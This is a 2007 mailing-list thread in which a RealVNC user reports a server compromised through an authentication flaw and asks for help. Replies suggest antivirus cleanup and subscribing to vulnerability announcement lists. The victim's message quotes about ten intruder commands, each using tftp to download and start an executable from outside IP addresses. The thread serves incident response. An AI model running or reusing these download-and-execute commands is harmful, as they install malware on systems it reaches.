Another good list to subscribe to is the Bugtraq list at http://www.securityfocus.com/. That list will let you know right away of any security flaws found in just about any serious application.
Thank you, Steve Bostedor http://www.vncscan.com -----Original Message----- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Alex Pelts Sent: Friday, February 09, 2007 9:24 PM To: Information Technology Dpt. Crafta Cc: [email protected] Subject: Re: my realvnc was hacked 1. Google for the exe files but most likely you will not get much. To remove them run antivirus package (Antivir is free and good). Before running it disable system restore in case the files are in windows directory. 2. Subscribe to vnc-announce-list to which this sort of information is posted. here is the link to relevant posting http://www.realvnc.com/pipermail/vnc-announce/2006.txt Regards, Alex Information Technology Dpt. Crafta wrote: > Hi, I was a victim of the "The vulnerability is caused due to an error > within the handling of VNC password authentication requests." > This is my official note of the case: > http://www.tek-tips.com/viewthread.cfm?qid=1330302&page=1 > This is the short explanation of what is that RealVNC vulnerability: > http://secunia.com/advisories/20107/ > > I have two questions: > > 1- Someone introduced without password to my realvnc server and executed > these commands: > %comspec% /c tftp -i 69.120.95.217 GET krqqr.exe & start krqqr > %comspec% /c tftp -i 69.120.95.217 GET khtv.exe & start khtv > %comspec% /c tftp -i 83.226.184.184 GET bjgpbrwf.exe & start bjgpbrwf > %comspec% /c tftp -i 83.226.184.184 GET dnyxl.exe & start dnyxl > %comspec% /c tftp -i 83.226.184.184 GET xixy.exe & start xixy > %comspec% /c tftp -i 83.226.184.184 GET cavm.exe & start cavm > %comspec% /c tftp -i 83.226.184.184 GET srsf.exe & start srsf > %comspec% /c tftp -i 83.226.184.184 GET odihiz.exe & start odihiz > %comspec% /c tftp -i 24.205.47.33 GET ltahq.exe & start ltahq > %comspec% /c tftp -i 24.205.47.33 GET jalqi.exe & start jalqi > > Does anyone knows what the hack are those? > > 2.- How can I be notified by email of the RealVNC vulnerabilities in > order do better secure practices? > > Thanks in advance > ALDO > _______________________________________________ > VNC-List mailing list > [email protected] > To remove yourself from the list visit: > http://www.realvnc.com/mailman/listinfo/vnc-list _______________________________________________ VNC-List mailing list [email protected] To remove yourself from the list visit: http://www.realvnc.com/mailman/listinfo/vnc-list _______________________________________________ VNC-List mailing list [email protected] To remove yourself from the list visit: http://www.realvnc.com/mailman/listinfo/vnc-list
